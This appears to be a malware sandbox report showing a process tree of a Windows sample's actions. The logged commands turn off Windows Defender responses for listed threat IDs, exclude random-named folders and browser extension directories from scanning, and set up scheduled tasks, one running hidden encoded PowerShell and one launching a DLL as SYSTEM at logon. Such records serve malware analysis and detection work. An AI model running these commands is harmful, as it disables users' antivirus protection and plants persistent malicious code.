  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4940
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4532
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:3912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3828
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3780
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4872
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YRaAzzcUU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YRaAzzcUU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZYpYvUfwMKUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZYpYvUfwMKUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bcDGOSnszpTU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bcDGOSnszpTU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nadwbZkmFdleQDJCsLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nadwbZkmFdleQDJCsLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uulhOemmgIOXC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uulhOemmgIOXC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HHFPPRMXrrQnklVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HHFPPRMXrrQnklVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\cChxpbaSEZypPfLfq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\cChxpbaSEZypPfLfq\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TEEaErdYmgJnvnOu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TEEaErdYmgJnvnOu\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YRaAzzcUU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2368
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YRaAzzcUU" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:1448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YRaAzzcUU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZYpYvUfwMKUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZYpYvUfwMKUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bcDGOSnszpTU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bcDGOSnszpTU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nadwbZkmFdleQDJCsLR" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2808
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nadwbZkmFdleQDJCsLR" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uulhOemmgIOXC" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3808
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uulhOemmgIOXC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\HHFPPRMXrrQnklVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\HHFPPRMXrrQnklVB /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4936
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\cChxpbaSEZypPfLfq /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\cChxpbaSEZypPfLfq /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\TEEaErdYmgJnvnOu /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1452
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\TEEaErdYmgJnvnOu /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3604
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gLuhUvwSY" /SC once /ST 01:31:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2820
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gLuhUvwSY"
  2⤵
  PID:1776
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gLuhUvwSY"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:468
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "DwGWbITCxFlrfOcyQ"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1336
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "DwGWbITCxFlrfOcyQ"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2900
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "DwGWbITCxFlrfOcyQ2"
  2⤵
  PID:2404
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "DwGWbITCxFlrfOcyQ2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:628
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "KZmDJfLQyasmMYLCR"
  2⤵
  PID:4328
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "KZmDJfLQyasmMYLCR"
  2⤵
  PID:3676
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "KZmDJfLQyasmMYLCR2"
  2⤵
  PID:1120
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "KZmDJfLQyasmMYLCR2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3876
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gtoVOqmBPJSfuwTxkKz"
  2⤵
  PID:4924
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gtoVOqmBPJSfuwTxkKz"
  2⤵
  PID:4820
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gtoVOqmBPJSfuwTxkKz2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4972
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gtoVOqmBPJSfuwTxkKz2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1160
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "KhAZksiYHkbAYZvhNlA"
  2⤵
  PID:2548
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "KhAZksiYHkbAYZvhNlA"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5092
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "KhAZksiYHkbAYZvhNlA2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3000
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "KhAZksiYHkbAYZvhNlA2"
  2⤵
  PID:1152
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\YRaAzzcUU\lFhHeQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OwQWslRjOgHVMZf" /V1 /F
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:4544
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gNWsRwQPfugSCbF"
  2⤵
  PID:4504
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gNWsRwQPfugSCbF"
  2⤵
  PID:2012
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gNWsRwQPfugSCbF2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4632
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gNWsRwQPfugSCbF2"
  2⤵
  PID:3084
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "MyBabwhBLSDOhD"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2908
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "MyBabwhBLSDOhD"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1596
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ponygaWrgotAq"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3100
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ponygaWrgotAq"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2956
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ponygaWrgotAq2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1188
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ponygaWrgotAq2"
  2⤵
  PID:2344
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "OwQWslRjOgHVMZf2" /F /xml "C:\Program Files (x86)\YRaAzzcUU\ccZwkaq.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3260
